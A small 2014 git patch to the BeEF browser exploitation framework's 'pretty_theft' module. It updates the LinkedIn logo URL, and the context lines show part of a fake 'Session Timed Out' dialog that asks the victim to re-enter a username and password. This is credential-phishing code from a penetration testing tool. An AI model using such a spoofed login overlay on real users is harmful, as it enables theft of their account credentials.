From 38fa28658f92a0cc98c0a9bf1a3d36f84f962099 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Sun, 30 Nov 2014 07:08:54 +0000 Subject: [PATCH] Update LinkedIn logo --- modules/social_engineering/pretty_theft/command.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/social_engineering/pretty_theft/command.js b/modules/social_engineering/pretty_theft/command.js index 93c6c2e92..28bed100e 100644 --- a/modules/social_engineering/pretty_theft/command.js +++ b/modules/social_engineering/pretty_theft/command.js @@ -151,7 +151,7 @@ beef.execute(function() { var box_prestyle = 'style="color: #666;font-size: 11px;font-weight: bold;font-family: Arial,sans-serif;padding-left:30px;"'; var inputboxstyle = 'style="width:140px;font-size: 11px;height: 20px;line-height:20px;padding-left:4px;border-style: solid;border-width: 1px;border-color:#CDCDCD;"'; var buttonstyle = 'style="font-size: 13px;background:#069;color:#fff;font-weight:bold;border: 1px #29447e solid;padding: 3px 3px 3px 3px;clear:both;margin-right:5px;"'; - var lilogo = 'http://press.linkedin.com/sites/all/themes/presslinkedin/images/LinkedIn_Logo_Web_Reverse_Trans2.png'; + var lilogo = 'http://press.linkedin.com/display-media/209/1'; var title = 'Session Timed Out LinkedIn'; var messagewords = 'Your session has timed out due to inactivity.

Please re-enter your username and password to login.'; var buttonLabel = '';